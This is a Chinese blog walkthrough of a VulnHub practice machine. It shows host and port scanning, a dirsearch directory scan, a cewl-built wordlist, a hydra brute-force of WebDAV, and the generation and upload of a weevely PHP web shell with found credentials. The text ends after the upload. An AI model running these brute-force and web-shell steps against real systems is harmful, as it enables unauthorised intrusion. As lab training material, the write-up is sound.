vulnhub是我们学习网络安全最常用的靶场之一。难易度适中,内容全面。是我们学习的不二选择。本文让我们一起学习吧!
声明:本文旨在网络安全学习和研究,坚决反对一切危害网络安全的行为。请务必遵守相关法律法规。
下载靶场
我们需要登录vulnhub官网对用的靶场。
如上,涉及到的靶场还是比较多的,点击靶场后我们会看到相应的靶场环境介绍。

前期信息收集
曾经大神说过:”渗透测试的本质是信息收集“。在运行虚拟机后,我们首先要进行收集一波信息。
😘主机IP地址
我们可以利用nmap
masscan
netdiscover
等工具扫描扫描存活的主机IP
netdiscover -i eth0 -r 192.168.123.1/24

🐼扫描开放的端口
当我们得到了主机的IP信息后,接下来需要对主机开放的端口进行扫描。
nmap -T4 -A 192.168.123.89
如上,我们只得到了
22
80
两个端口。相对来说开放的端口还是比较少的。
web扫描
通过对上面端口的扫描,我们只有两种方案,一种是通过80端口的web服务进行测试,另一方面就是暴力破解ssh了。相对于后者难度就大了。
🚵对web站点目录扫描
我们在用kali中自带的工具dirsearch
进行目录扫描,看能否找到有用的信息。
dirsearch -u http://192.168.123.89/
如上图,我们得到了
webdav
目录,通过webdav
可以实现类似ftp文件传输的功能,但是利用的是web协议。
通过弱口令登录无果。我们在次利用工具
dirsearch
对站点中的文件扫描,如php
txt
等文件
dirsearch -u http://192.168.123.89 -f -e txt
通过本次扫描,我们发现了一个
tips.txt
文件。访问文件,内容如下:
这时,陷入了两难境地!我们要登录ssh需要账号和密码,而给出的提示文本访问时却提示不存在。通过查阅我们可以通过
cewl
工具生成专门针对于目标系统的密码字典。
cewl http://192.168.123.89 -w dict.txt

🎶暴力破解webdav
hydra -L dict.txt -P dict.txt 192.168.123.89 http-get /webdav -v

🐇上传shell
我们先利用kali中自带的weevely
工具生成php Shell
weevely generate 888888 /kali.php
通过davtest命令上传shell到服务器。
davtest -url http://192.168.123.89/webdav -auth yamdoot:Swarg -uploadfile kali.php -uploadloc kali2.php
-
-uploadfile表示指定上传的文件, -
-uploadloc表示上传后的文件名 上传成功后,我们利用weevely登录系统。
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):玩转vulnhub靶场
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/152303.html